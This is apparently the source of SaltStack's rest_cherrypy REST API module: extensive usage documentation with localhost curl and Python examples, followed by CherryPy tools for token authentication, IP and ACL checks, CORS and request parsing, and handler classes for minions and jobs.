A filesystem path to an HTML file that will be served as a static file.
This is useful for bootstrapping a single-page JavaScript app.
Warning! If you set this option to a custom web application, anything
that uses cookie-based authentication is vulnerable to XSRF attacks.
Send the custom ``X-Auth-Token`` header instead and consider disabling
the ``enable_sessions`` setting.
.. versionchanged:: 2017.7.0
Add a proof-of-concept JavaScript single-page app.
app_path : ``/app``
The URL prefix to use for serving the HTML file specified in the ``app``
setting. This should be a simple name containing no slashes.
Any path information after the specified path is ignored; this is
useful for apps that utilize the HTML5 history API.
root_prefix : ``/``
A URL path to the main entry point for the application. This is useful
for serving multiple applications from the same URL.
.. _rest_cherrypy-auth:
Authentication
--------------
Authentication is performed by passing a session token with each request.
Tokens are generated via the :py:class:`Login` URL.
The token may be sent in one of two ways: as a custom header or as a session
cookie. The latter is far more convenient for clients that support cookies.
* Include a custom header named :mailheader:`X-Auth-Token`.
For example, using curl:
.. code-block:: bash
curl -sSk https://localhost:8000/login \\
-H 'Accept: application/x-yaml' \\
-d username=saltdev \\
-d password=saltdev \\
-d eauth=pam
Copy the ``token`` value from the output and include it in subsequent requests:
.. code-block:: bash
curl -sSk https://localhost:8000 \\
-H 'Accept: application/x-yaml' \\
-H 'X-Auth-Token: 697adbdc8fe971d09ae4c2a3add7248859c87079'\\
-d client=local \\
-d tgt='*' \\
-d fun=test.ping
* Sent via a cookie. This option is a convenience for HTTP clients that
automatically handle cookie support (such as browsers).
For example, using curl:
.. code-block:: bash
# Write the cookie file:
curl -sSk https://localhost:8000/login \\
-c ~/cookies.txt \\
-H 'Accept: application/x-yaml' \\
-d username=saltdev \\
-d password=saltdev \\
-d eauth=auto
# Read the cookie file:
curl -sSk https://localhost:8000 \\
-b ~/cookies.txt \\
-H 'Accept: application/x-yaml' \\
-d client=local \\
-d tgt='*' \\
-d fun=test.ping
Another example using the :program:`requests` library in Python:
.. code-block:: python
>>> import requests
>>> session = requests.Session()
>>> session.post('http://localhost:8000/login', json={
'username': 'saltdev',
'password': 'saltdev',
'eauth': 'auto',
})
<Response [200]>
>>> resp = session.post('http://localhost:8000', json=[{
'client': 'local',
'tgt': '*',
'fun': 'test.arg',
'arg': ['foo', 'bar'],
'kwarg': {'baz': 'Baz!'},
}])
>>> resp.json()
{u'return': [{
...snip...
}]}
.. seealso:: You can bypass the session handling via the :py:class:`Run` URL.
Usage
-----
This interface directly exposes Salt's :ref:`Python API <python-api>`.
Everything possible at the CLI is possible through the Python API. Commands are
executed on the Salt Master.
The root URL (``/``) is RPC-like in that it accepts instructions in the request
body for what Salt functions to execute, and the response contains the result
of those function calls.
For example:
.. code-block:: text
% curl -sSi https://localhost:8000 \
-H 'Content-type: application/json' \
-d '[{
"client": "local",
"tgt": "*",
"fun": "test.ping"
}]'
HTTP/1.1 200 OK
Content-Type: application/json
[...snip...]
{"return": [{"jerry": true}]}
The request body must be an array of commands. Use this workflow to build a
command:
1. Choose a client interface.
2. Choose a function.
3. Fill out the remaining parameters needed for the chosen client.
The ``client`` field is a reference to the main Python classes used in Salt's
Python API. Read the full :ref:`Client APIs <client-apis>` documentation, but
in short:
* "local" uses :py:class:`LocalClient <salt.client.LocalClient>` which sends
commands to Minions. Equivalent to the ``salt`` CLI command.
* "runner" uses :py:class:`RunnerClient <salt.runner.RunnerClient>` which
invokes runner modules on the Master. Equivalent to the ``salt-run`` CLI
command.
* "wheel" uses :py:class:`WheelClient <salt.wheel.WheelClient>` which invokes
wheel modules on the Master. Wheel modules do not have a direct CLI
equivalent; they typically manage Master-side resources such as state
files, pillar files, and the Salt config files. The :py:mod:`key wheel module
<salt.wheel.key>` exposes functionality similar to the ``salt-key`` CLI
command.
Most clients have variants like synchronous or asynchronous execution as well as
others like batch execution. See the :ref:`full list of client interfaces
<client-interfaces>`.
Each client requires different arguments and sometimes has different syntax.
For example, ``LocalClient`` requires the ``tgt`` argument because it forwards
the command to Minions and the other client interfaces do not. ``LocalClient``
also takes ``arg`` (array) and ``kwarg`` (dictionary) arguments because these
values are sent to the Minions and used to execute the requested function
there. ``RunnerClient`` and ``WheelClient`` are executed directly on the Master
and thus do not need or accept those arguments.
Read the method signatures in the client documentation linked above, but
hopefully an example will help illustrate the concept. This example causes Salt
to execute two functions -- the :py:func:`test.arg execution function
<salt.modules.test.arg>` using ``LocalClient`` and the :py:func:`test.arg
runner function <salt.runners.test.arg>` using ``RunnerClient``; note the
different structure for each command. The results for both are combined and
returned as one response.
.. code-block:: text
% curl -b ~/cookies.txt -sSi localhost:8000 \
-H 'Content-type: application/json' \
-d '
[
{
"client": "local",
"tgt": "*",
"fun": "test.arg",
"arg": ["positional arg one", "positional arg two"],
"kwarg": {
"keyword arg one": "Hello from a minion",
"keyword arg two": "Hello again from a minion"
}
},
{
"client": "runner",
"fun": "test.arg",
"keyword arg one": "Hello from a master",
"keyword arg two": "Runners do not support positional args"
}
]
'
HTTP/1.1 200 OK
[...snip...]
{
"return": [
{
"jerry": {
"args": [
"positional arg one",
"positional arg two"
],
"kwargs": {
"keyword arg one": "Hello from a minion",
"keyword arg two": "Hello again from a minion",
[...snip...]
}
},
[...snip; other minion returns here...]
},
{
"args": [],
"kwargs": {
"keyword arg two": "Runners do not support positional args",
"keyword arg one": "Hello from a master"
}
}
]
}
One more example, this time with more commonly used functions:
.. code-block:: text
curl -b /tmp/cookies.txt -sSi localhost:8000 \
-H 'Content-type: application/json' \
-d '
[
{
"client": "local",
"tgt": "*",
"fun": "state.sls",
"kwarg": {
"mods": "apache",
"pillar": {
"lookup": {
"wwwdir": "/srv/httpd/htdocs"
}
}
}
},
{
"client": "runner",
"fun": "cloud.create",
"provider": "my-ec2-provider",
"instances": "my-centos-6",
"image": "ami-1624987f",
"delvol_on_destroy", true
}
]
'
HTTP/1.1 200 OK
[...snip...]
{
"return": [
{
"jerry": {
"pkg_|-install_apache_|-httpd_|-installed": {
[...snip full state return here...]
}
}
[...snip other minion returns here...]
},
{
[...snip full salt-cloud output here...]
}
]
}
Content negotiation
-------------------
This REST interface is flexible in what data formats it will accept as well
as what formats it will return (e.g., JSON, YAML, urlencoded).
* Specify the format of data in the request body by including the
:mailheader:`Content-Type` header.
* Specify the desired data format for the response body with the
:mailheader:`Accept` header.
We recommend the JSON format for most HTTP requests. urlencoded data is simple
and cannot express complex data structures -- and that is often required for
some Salt commands, such as starting a state run that uses Pillar data. Salt's
CLI tool can reformat strings passed in at the CLI into complex data
structures, and that behavior also works via salt-api, but it can be brittle;
since salt-api accepts JSON, it is best to just send JSON.
Here is an example of sending urlencoded data:
.. code-block:: bash
curl -sSik https://localhost:8000 \\
-b ~/cookies.txt \\
-d client=runner \\
-d fun='jobs.lookup_jid' \\
-d jid='20150129182456704682'
.. admonition:: urlencoded data caveats
* Only a single command may be sent per HTTP request.
* Repeating the ``arg`` parameter multiple times will cause those
parameters to be combined into a single list.
Note, some popular frameworks and languages (notably jQuery, PHP, and
Ruby on Rails) will automatically append empty brackets onto repeated
query string parameters. E.g., ``?foo[]=fooone&foo[]=footwo``. This is
**not** supported; send ``?foo=fooone&foo=footwo`` instead, or send JSON
or YAML.
A note about ``curl``
The ``-d`` flag to curl does *not* automatically urlencode data which can
affect passwords and other data that contains characters that must be
encoded. Use the ``--data-urlencode`` flag instead. E.g.:
.. code-block:: bash
curl -ksi http://localhost:8000/login \\
-H "Accept: application/json" \\
-d username='myapiuser' \\
--data-urlencode password='1234+' \\
-d eauth='pam'
Performance Expectations and Recommended Usage
==============================================
This module provides a thin wrapper around :ref:`Salt's Python API
<python-api>`. Executing a Salt command via rest_cherrypy is directly analogous
to executing a Salt command via Salt's CLI (which also uses the Python API) --
they share the same semantics, performance characteristics, and 98% of the same
code. As a rule-of-thumb: if you wouldn't do it at the CLI don't do it via this
API.
Long-Running HTTP Connections
-----------------------------
The CherryPy server is a production-ready, threading HTTP server written in
Python. Because it makes use of a thread pool to process HTTP requests it is
not ideally suited to maintaining large numbers of concurrent, synchronous
connections. On moderate hardware with default settings it should top-out at
around 30 to 50 concurrent connections.
That number of long-running, synchronous Salt processes is also not ideal. Like
at the CLI, each Salt command run will start a process that instantiates its
own ``LocalClient``, which instantiates its own listener to the Salt event bus,
and sends out its own periodic ``saltutil.find_job`` queries to determine if a
Minion is still running the command. Not exactly a lightweight operation.
Timeouts
--------
In addition to the above resource overhead for long-running connections, there
are the usual HTTP timeout semantics for the CherryPy server, any HTTP client
being used, as well as any hardware in between such as proxies, gateways, or
load balancers. rest_cherrypy can be configured not to time-out long responses
via the ``expire_responses`` setting, and both :py:class:`LocalClient
<salt.client.LocalClient>` and :py:class:`RunnerClient
<salt.runner.RunnerClient>` have their own timeout parameters that may be
passed as top-level keywords:
.. code-block:: bash
curl -b /tmp/cookies.txt -sSi localhost:8000 \
-H 'Content-type: application/json' \
-d '
[
{
"client": "local",
"tgt": "*",
"fun": "test.sleep",
"kwarg": {"length": 30},
"timeout": 60
},
{
"client": "runner",
"fun": "test.sleep",
"kwarg": {"s_time": 30},
"timeout": 60
}
]
'
Best Practices
--------------
Given the performance overhead and HTTP timeouts for long-running operations
described above, the most effective and most scalable way to use both Salt and
salt-api is to run commands asynchronously using the ``local_async``,
``runner_async``, and ``wheel_async`` clients.
Running asynchronous jobs results in being able to process 3x more commands per second
for ``LocalClient`` and 17x more commands per second for ``RunnerClient``, in
addition to much less network traffic and memory requirements. Job returns can
be fetched from Salt's job cache via the ``/jobs/<jid>`` endpoint, or they can
be collected into a data store using Salt's :ref:`Returner system <returners>`.
The ``/events`` endpoint is specifically designed to handle long-running HTTP
connections and it exposes Salt's event bus which includes job returns.
Watching this endpoint first, then executing asynchronous Salt commands second,
is the most lightweight and scalable way to use ``rest_cherrypy`` while still
receiving job returns in real-time. But this requires clients that can properly
handle the inherent asynchronicity of that workflow.
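For example, a minimal asynchronous round trip using the :program:`requests`
library might look like the following sketch (the credentials, target, and
function are placeholders; adjust them for your environment):
.. code-block:: python
>>> import requests
>>> session = requests.Session()
>>> session.post('http://localhost:8000/login', json={
'username': 'saltdev',
'password': 'saltdev',
'eauth': 'auto',
})
<Response [200]>
>>> resp = session.post('http://localhost:8000', json=[{
'client': 'local_async',
'tgt': '*',
'fun': 'test.ping',
}])
>>> jid = resp.json()['return'][0]['jid']
>>> session.get('http://localhost:8000/jobs/{}'.format(jid)).json()
{u'return': [{
...snip...
}]}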
Performance Tuning
------------------
The ``thread_pool`` and ``socket_queue_size`` settings can be used to increase
the capacity of rest_cherrypy to handle incoming requests. Keep an eye on RAM
usage as well as available file handles while testing changes to these
settings. As salt-api is a thin wrapper around Salt's Python API, also keep an
eye on the performance of Salt when testing.
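For example, a modestly enlarged worker pool could be configured as follows
(the values shown are illustrative starting points, not recommendations):
.. code-block:: yaml
rest_cherrypy:
port: 8000
thread_pool: 200
socket_queue_size: 60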
Future Plans
------------
Now that Salt uses the Tornado concurrency library internally, we plan to
improve performance in the API by taking advantage of existing processes and
event listeners and to use lightweight coroutines to facilitate more
simultaneous HTTP connections and better support for synchronous operations.
That effort can be tracked in `issue 26505`__, but until that issue is closed
rest_cherrypy will remain the officially recommended REST API.
.. __: https://github.com/saltstack/salt/issues/26505
.. |req_token| replace:: a session token from :py:class:`~Login`.
.. |req_accept| replace:: the desired response format.
.. |req_ct| replace:: the format of the request body.
.. |res_ct| replace:: the format of the response body; depends on the
:mailheader:`Accept` request header.
.. |200| replace:: success
.. |400| replace:: bad or malformed request
.. |401| replace:: authentication required
.. |406| replace:: requested Content-Type not available
"""
import functools
import io
import itertools
import logging
import os
import signal
import tarfile
from collections.abc import Iterator, Mapping
from multiprocessing import Pipe, Process
from urllib.parse import parse_qsl
import cherrypy # pylint: disable=import-error,3rd-party-module-not-gated
import salt
import salt.auth
import salt.exceptions
import salt.netapi
import salt.utils.event
import salt.utils.json
import salt.utils.stringutils
import salt.utils.versions
import salt.utils.yaml
logger = logging.getLogger(__name__)
try:
from cherrypy.lib import ( # pylint: disable=import-error,3rd-party-module-not-gated
cpstats,
)
except AttributeError:
cpstats = None
logger.warn(
"Import of cherrypy.cpstats failed. "
"Possible upstream bug: "
"https://github.com/cherrypy/cherrypy/issues/1444"
)
except ImportError:
cpstats = None
logger.warn("Import of cherrypy.cpstats failed.")
try:
# Imports related to websocket
from .tools import websockets
from . import event_processor
HAS_WEBSOCKETS = True
except ImportError:
websockets = type("websockets", (object,), {"SynchronizingWebsocket": None})
HAS_WEBSOCKETS = False
def html_override_tool():
"""
Bypass the normal handler and serve HTML for all URLs
The ``app_path`` setting must be non-empty and the request must ask for
``text/html`` in the ``Accept`` header.
"""
apiopts = cherrypy.config["apiopts"]
request = cherrypy.request
url_blacklist = (
apiopts.get("app_path", "/app"),
apiopts.get("static_path", "/static"),
)
if "app" not in cherrypy.config["apiopts"]:
return
if request.path_info.startswith(url_blacklist):
return
if request.headers.get("Accept") == "*/*":
return
try:
wants_html = cherrypy.lib.cptools.accept("text/html")
except cherrypy.HTTPError:
return
else:
if wants_html != "text/html":
return
raise cherrypy.InternalRedirect(apiopts.get("app_path", "/app"))
def salt_token_tool():
"""
If the custom authentication header is supplied, put it in the cookie dict
so the rest of the session-based auth works as intended
"""
x_auth = cherrypy.request.headers.get("X-Auth-Token", None)
# X-Auth-Token header trumps session cookie
if x_auth:
cherrypy.request.cookie["session_id"] = x_auth
def salt_api_acl_tool(username, request):
"""
.. versionadded:: 2016.3.0
Verifies user requests against the API whitelist (user/IP pairs)
in order to provide whitelisting for the API, similar to the
master's ACL but enforced at the API layer.
.. code-block:: yaml
rest_cherrypy:
api_acl:
users:
'*':
- 1.1.1.1
- 1.1.1.2
foo:
- 8.8.4.4
bar:
- '*'
:param username: Username to check against the API.
:type username: str
:param request: Cherrypy request to check against the API.
:type request: cherrypy.request
"""
failure_str = "[api_acl] Authentication failed for " "user {0} from IP {1}"
success_str = "[api_acl] Authentication successful for user {0} from IP {1}"
pass_str = "[api_acl] Authentication not checked for " "user {0} from IP {1}"
acl = None
# Salt Configuration
salt_config = cherrypy.config.get("saltopts", None)
if salt_config:
# Cherrypy Config.
cherrypy_conf = salt_config.get("rest_cherrypy", None)
if cherrypy_conf:
# ACL Config.
acl = cherrypy_conf.get("api_acl", None)
ip = request.remote.ip
if acl:
users = acl.get("users", {})
if users:
if username in users:
if ip in users[username] or "*" in users[username]:
logger.info(success_str.format(username, ip))
return True
else:
logger.info(failure_str.format(username, ip))
return False
elif username not in users and "*" in users:
if ip in users["*"] or "*" in users["*"]:
logger.info(success_str.format(username, ip))
return True
else:
logger.info(failure_str.format(username, ip))
return False
else:
logger.info(failure_str.format(username, ip))
return False
else:
logger.info(pass_str.format(username, ip))
return True
def salt_ip_verify_tool():
"""
If there is a list of restricted IPs, verify current
client is coming from one of those IPs.
"""
# This is overly cumbersome and crude,
# But, it's also safe... ish...
salt_config = cherrypy.config.get("saltopts", None)
if salt_config:
cherrypy_conf = salt_config.get("rest_cherrypy", None)
if cherrypy_conf:
auth_ip_list = cherrypy_conf.get("authorized_ips", None)
if auth_ip_list:
logger.debug("Found IP list: {}".format(auth_ip_list))
rem_ip = cherrypy.request.headers.get("Remote-Addr", None)
logger.debug("Request from IP: {}".format(rem_ip))
if rem_ip not in auth_ip_list:
logger.error("Blocked IP: {}".format(rem_ip))
raise cherrypy.HTTPError(403, "Bad IP")
def salt_auth_tool():
"""
Redirect all unauthenticated requests to the login page
"""
# Redirect to the login page if the session hasn't been authed
if "token" not in cherrypy.session: # pylint: disable=W8601
raise cherrypy.HTTPError(401)
# Session is authenticated; inform caches
cherrypy.response.headers["Cache-Control"] = "private"
def cors_tool():
"""
Handle both simple and complex CORS requests
Add CORS headers to each response. If the request is a CORS preflight
request swap out the default handler with a simple, single-purpose handler
that verifies the request and provides a valid CORS response.
"""
req_head = cherrypy.request.headers
resp_head = cherrypy.response.headers
# Always set response headers necessary for 'simple' CORS.
resp_head["Access-Control-Allow-Origin"] = req_head.get("Origin", "*")
resp_head["Access-Control-Expose-Headers"] = "GET, POST"
resp_head["Access-Control-Allow-Credentials"] = "true"
# Non-simple CORS preflight request; short-circuit the normal handler.
if cherrypy.request.method == "OPTIONS":
ac_method = req_head.get("Access-Control-Request-Method", None)
allowed_methods = ["GET", "POST"]
allowed_headers = [
"Content-Type",
"X-Auth-Token",
"X-Requested-With",
]
if ac_method and ac_method in allowed_methods:
resp_head["Access-Control-Allow-Methods"] = ", ".join(allowed_methods)
resp_head["Access-Control-Allow-Headers"] = ", ".join(allowed_headers)
resp_head["Connection"] = "keep-alive"
resp_head["Access-Control-Max-Age"] = "1400"
# Note: CherryPy on Py3 uses binary objects for the response
# Python 2.6 also supports the byte prefix, so no need for conditionals
cherrypy.response.body = b""
cherrypy.response.status = 200
# CORS requests should short-circuit the other tools.
cherrypy.serving.request.handler = None
# Needed to avoid the auth_tool check.
if cherrypy.request.config.get("tools.sessions.on", False):
cherrypy.session["token"] = True
return True
# Be conservative in what you send
# Maps Content-Type to serialization functions; this is a tuple of tuples to
# preserve order of preference.
ct_out_map = (
("application/json", salt.utils.json.dumps),
(
"application/x-yaml",
functools.partial(salt.utils.yaml.safe_dump, default_flow_style=False),
),
)
def hypermedia_handler(*args, **kwargs):
"""
Determine the best output format based on the Accept header, execute the
regular handler, and transform the output to the request content type (even
if it's an error).
:param args: Pass args through to the main handler
:param kwargs: Pass kwargs through to the main handler
"""
# Execute the real handler. Handle or pass-through any errors we know how
# to handle (auth & HTTP errors). Reformat any errors we don't know how to
# handle as a data structure.
try:
cherrypy.response.processors = dict(ct_out_map)
ret = cherrypy.serving.request._hypermedia_inner_handler(*args, **kwargs)
except (
salt.exceptions.AuthenticationError,
salt.exceptions.AuthorizationError,
salt.exceptions.EauthAuthenticationError,
salt.exceptions.TokenAuthenticationError,
):
raise cherrypy.HTTPError(401)
except salt.exceptions.SaltInvocationError:
raise cherrypy.HTTPError(400)
except (
salt.exceptions.SaltDaemonNotRunning,
salt.exceptions.SaltReqTimeoutError,
) as exc:
raise cherrypy.HTTPError(503, exc.strerror)
except salt.exceptions.SaltClientTimeout:
raise cherrypy.HTTPError(504)
except cherrypy.CherryPyException:
raise
except Exception as exc: # pylint: disable=broad-except
# The TimeoutError exception class was removed in CherryPy 12.0.0, but
# still check for its existence and handle it when running CherryPy < 12.
# The check was moved down from the SaltClientTimeout except clause because
# referencing the missing class there raises a TypeError (exception classes
# must inherit from BaseException).
if hasattr(cherrypy, "TimeoutError") and isinstance(exc, cherrypy.TimeoutError):
raise cherrypy.HTTPError(504)
import traceback
logger.debug(
"Error while processing request for: %s",
cherrypy.request.path_info,
exc_info=True,
)
cherrypy.response.status = 500
ret = {
"status": cherrypy.response.status,
"return": "{}".format(traceback.format_exc(exc))
if cherrypy.config["debug"]
else "An unexpected error occurred",
}
# Raises 406 if requested content-type is not supported
best = cherrypy.lib.cptools.accept([i for (i, _) in ct_out_map])
# Transform the output from the handler into the requested output format
cherrypy.response.headers["Content-Type"] = best
out = cherrypy.response.processors[best]
try:
response = out(ret)
return salt.utils.stringutils.to_bytes(response)
except Exception: # pylint: disable=broad-except
msg = "Could not serialize the return data from Salt."
logger.debug(msg, exc_info=True)
raise cherrypy.HTTPError(500, msg)
def hypermedia_out():
"""
Determine the best handler for the requested content type
Wrap the normal handler and transform the output from that handler into the
requested content type
"""
request = cherrypy.serving.request
request._hypermedia_inner_handler = request.handler
# If handler has been explicitly set to None, don't override.
if request.handler is not None:
request.handler = hypermedia_handler
def process_request_body(fn):
"""
A decorator to skip a processor function if process_request_body is False
"""
@functools.wraps(fn)
def wrapped(*args, **kwargs): # pylint: disable=C0111
if cherrypy.request.process_request_body is not False:
fn(*args, **kwargs)
return wrapped
def urlencoded_processor(entity):
"""
Accept x-www-form-urlencoded data and reformat it into a Low State
data structure.
Since we can't easily represent complicated data structures with
key-value pairs, any more complicated requirements (e.g. compound
commands) must instead be delivered via JSON or YAML.
For example::
.. code-block:: bash
curl -si localhost:8000 -d client=local -d tgt='*' \\
-d fun='test.kwarg' -d arg='one=1' -d arg='two=2'
:param entity: raw POST data
"""
# cherrypy._cpreqbody.process_urlencoded doesn't preserve the raw
# "body", so we have to handle parsing the tokens using parse_qsl
urlencoded = entity.read()
try:
urlencoded = urlencoded.decode("utf-8")
except (UnicodeDecodeError, AttributeError):
pass
cherrypy.serving.request.raw_body = urlencoded
cherrypy.serving.request.unserialized_data = dict(parse_qsl(urlencoded))
@process_request_body
def json_processor(entity):
"""
Unserialize raw POST data in JSON format to a Python data structure.
:param entity: raw POST data
"""
# https://github.com/cherrypy/cherrypy/pull/1572
contents = io.BytesIO()
body = entity.fp.read(fp_out=contents)
contents.seek(0)
body = salt.utils.stringutils.to_unicode(contents.read())
del contents
try:
cherrypy.serving.request.unserialized_data = salt.utils.json.loads(body)
except ValueError:
raise cherrypy.HTTPError(400, "Invalid JSON document")
cherrypy.serving.request.raw_body = body
@process_request_body
def yaml_processor(entity):
"""
Unserialize raw POST data in YAML format to a Python data structure.
:param entity: raw POST data
"""
# https://github.com/cherrypy/cherrypy/pull/1572
contents = io.BytesIO()
body = entity.fp.read(fp_out=contents)
contents.seek(0)
body = salt.utils.stringutils.to_unicode(contents.read())
try:
cherrypy.serving.request.unserialized_data = salt.utils.yaml.safe_load(body)
except ValueError:
raise cherrypy.HTTPError(400, "Invalid YAML document")
cherrypy.serving.request.raw_body = body
@process_request_body
def text_processor(entity):
"""
Attempt to unserialize plain text as JSON
Some large services still send JSON with a text/plain Content-Type. Those
services are bad and should feel bad.
:param entity: raw POST data
"""
# https://github.com/cherrypy/cherrypy/pull/1572
contents = io.BytesIO()
body = entity.fp.read(fp_out=contents)
contents.seek(0)
body = salt.utils.stringutils.to_unicode(contents.read())
try:
cherrypy.serving.request.unserialized_data = salt.utils.json.loads(body)
except ValueError:
cherrypy.serving.request.unserialized_data = body
cherrypy.serving.request.raw_body = body
def hypermedia_in():
"""
Unserialize POST/PUT data of a specified Content-Type.
The following custom processors all are intended to format Low State data
and will place that data structure into the request object.
:raises HTTPError: if the request contains a Content-Type that we do not
have a processor for
"""
# Be liberal in what you accept
ct_in_map = {
"application/x-www-form-urlencoded": urlencoded_processor,
"application/json": json_processor,
"application/x-yaml": yaml_processor,
"text/yaml": yaml_processor,
"text/plain": text_processor,
}
# Do not process the body for POST requests that have specified no content
# or have not specified Content-Length
if (
cherrypy.request.method.upper() == "POST"
and cherrypy.request.headers.get("Content-Length", "0") == "0"
):
cherrypy.request.process_request_body = False
cherrypy.request.unserialized_data = None
cherrypy.request.body.processors.clear()
cherrypy.request.body.default_proc = cherrypy.HTTPError(
406, "Content type not supported"
)
cherrypy.request.body.processors = ct_in_map
def lowdata_fmt():
"""
Validate and format lowdata from incoming unserialized request data
This tool requires that the hypermedia_in tool has already been run.
"""
if cherrypy.request.method.upper() != "POST":
return
data = cherrypy.request.unserialized_data
# if the data was sent as urlencoded, we need to make it a list.
# this is a very forgiving implementation as different clients set different
# headers for form encoded data (including charset or something similar)
if data and isinstance(data, Mapping):
# Make the 'arg' param a list if not already
if "arg" in data and not isinstance(
data["arg"], list
): # pylint: disable=unsupported-membership-test
data["arg"] = [data["arg"]]
# Finally, make a Low State and put it in request
cherrypy.request.lowstate = [data]
else:
cherrypy.serving.request.lowstate = data
tools_config = {
"on_start_resource": [
("html_override", html_override_tool),
("salt_token", salt_token_tool),
],
"before_request_body": [
("cors_tool", cors_tool),
("salt_auth", salt_auth_tool),
("hypermedia_in", hypermedia_in),
],
"before_handler": [
("lowdata_fmt", lowdata_fmt),
("hypermedia_out", hypermedia_out),
("salt_ip_verify", salt_ip_verify_tool),
],
}
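# Register each tool above with CherryPy at its configured hook point; the
# priority offset (50 + idx) preserves the order in which the tools are listed.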
for hook, tool_list in tools_config.items():
for idx, tool_config in enumerate(tool_list):
tool_name, tool_fn = tool_config
setattr(
cherrypy.tools, tool_name, cherrypy.Tool(hook, tool_fn, priority=(50 + idx))
)
###############################################################################
class LowDataAdapter:
"""
The primary entry point to Salt's REST API
"""
exposed = True
_cp_config = {
"tools.salt_token.on": True,
"tools.sessions.on": True,
"tools.sessions.timeout": 60 * 10, # 10 hours
# 'tools.autovary.on': True,
"tools.hypermedia_out.on": True,
"tools.hypermedia_in.on": True,
"tools.lowdata_fmt.on": True,
"tools.salt_ip_verify.on": True,
}
def __init__(self):
self.opts = cherrypy.config["saltopts"]
self.apiopts = cherrypy.config["apiopts"]
self.api = salt.netapi.NetapiClient(self.opts)
def exec_lowstate(self, client=None, token=None):
"""
Pull a Low State data structure from request and execute the low-data
chunks through Salt. The low-data chunks will be updated to include the
authorization token for the current session.
"""
lowstate = cherrypy.request.lowstate
# Release the session lock before executing any potentially
# long-running Salt commands. This allows different threads to execute
# Salt commands concurrently without blocking.
if cherrypy.request.config.get("tools.sessions.on", False):
cherrypy.session.release_lock()
# If the loaded lowstate isn't a list, let the client know.
if not isinstance(lowstate, list):
raise cherrypy.HTTPError(400, "Lowstates must be a list")
# Make any requested additions or modifications to each lowstate, then
# execute each one and yield the result.
for chunk in lowstate:
if token:
chunk["token"] = token
if "token" in chunk:
# Make sure that auth token is hex
try:
int(chunk["token"], 16)
except (TypeError, ValueError):
raise cherrypy.HTTPError(401, "Invalid token")
if "token" in chunk:
# Make sure that auth token is hex
try:
int(chunk["token"], 16)
except (TypeError, ValueError):
raise cherrypy.HTTPError(401, "Invalid token")
if client:
chunk["client"] = client
# Make any 'arg' params a list if not already.
# This is largely to fix a deficiency in the urlencoded format.
if "arg" in chunk and not isinstance(chunk["arg"], list):
chunk["arg"] = [chunk["arg"]]
ret = self.api.run(chunk)
# Sometimes Salt gives us a return and sometimes an iterator
if isinstance(ret, Iterator):
yield from ret
else:
yield ret
@cherrypy.config(**{"tools.sessions.on": False})
def GET(self):
"""
An explanation of the API with links of where to go next
.. http:get:: /
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000
.. code-block:: text
GET / HTTP/1.1
Host: localhost:8000
Accept: application/json
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Type: application/json
"""
return {
"return": "Welcome",
"clients": salt.netapi.CLIENTS,
}
@cherrypy.tools.salt_token()
@cherrypy.tools.salt_auth()
def POST(self, **kwargs):
"""
Send one or more Salt commands in the request body
.. http:post:: /
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 400: |400|
:status 401: |401|
:status 406: |406|
:term:`lowstate` data describing Salt commands must be sent in the
request body.
**Example request:**
.. code-block:: bash
curl -sSik https://localhost:8000 \\
-b ~/cookies.txt \\
-H "Accept: application/x-yaml" \\
-H "Content-type: application/json" \\
-d '[{"client": "local", "tgt": "*", "fun": "test.ping"}]'
.. code-block:: text
POST / HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
X-Auth-Token: d40d1e1e
Content-Type: application/json
[{"client": "local", "tgt": "*", "fun": "test.ping"}]
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 200
Allow: GET, HEAD, POST
Content-Type: application/x-yaml
return:
- ms-0: true
ms-1: true
ms-2: true
ms-3: true
ms-4: true
"""
return {"return": list(self.exec_lowstate(token=cherrypy.session.get("token")))}
class Minions(LowDataAdapter):
"""
Convenience URLs for working with minions
"""
_cp_config = dict(LowDataAdapter._cp_config, **{"tools.salt_auth.on": True})
def GET(self, mid=None): # pylint: disable=arguments-differ
"""
A convenience URL for getting lists of minions or getting minion
details
.. http:get:: /minions/(mid)
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/minions/ms-3
.. code-block:: text
GET /minions/ms-3 HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 129005
Content-Type: application/x-yaml
return:
- ms-3:
grains.items:
...
"""
cherrypy.request.lowstate = [
{"client": "local", "tgt": mid or "*", "fun": "grains.items"}
]
return {
"return": list(self.exec_lowstate(token=cherrypy.session.get("token"))),
}
def POST(self, **kwargs):
"""
Start an execution command and immediately return the job id
.. http:post:: /minions
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 400: |400|
:status 401: |401|
:status 406: |406|
Lowstate data describing Salt commands must be sent in the request
body. The ``client`` option will be set to
:py:meth:`~salt.client.LocalClient.local_async`.
**Example request:**
.. code-block:: bash
curl -sSi localhost:8000/minions \\
-b ~/cookies.txt \\
-H "Accept: application/x-yaml" \\
-d '[{"tgt": "*", "fun": "status.diskusage"}]'
.. code-block:: text
POST /minions HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Type: application/json
tgt=*&fun=status.diskusage
**Example response:**
.. code-block:: text
HTTP/1.1 202 Accepted
Content-Length: 86
Content-Type: application/x-yaml
return:
- jid: '20130603122505459265'
minions: [ms-4, ms-3, ms-2, ms-1, ms-0]
_links:
jobs:
- href: /jobs/20130603122505459265
"""
job_data = list(
self.exec_lowstate(
client="local_async", token=cherrypy.session.get("token")
)
)
cherrypy.response.status = 202
return {
"return": job_data,
"_links": {
"jobs": [{"href": "/jobs/{}".format(i["jid"])} for i in job_data if i],
},
}
class Jobs(LowDataAdapter):
_cp_config = dict(LowDataAdapter._cp_config, **{"tools.salt_auth.on": True})
def GET(self, jid=None, timeout=""): # pylint: disable=arguments-differ
"""
A convenience URL for getting lists of previously run jobs or getting
the return from a single job
.. http:get:: /jobs/(jid)
List jobs or show a single job from the job cache.
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
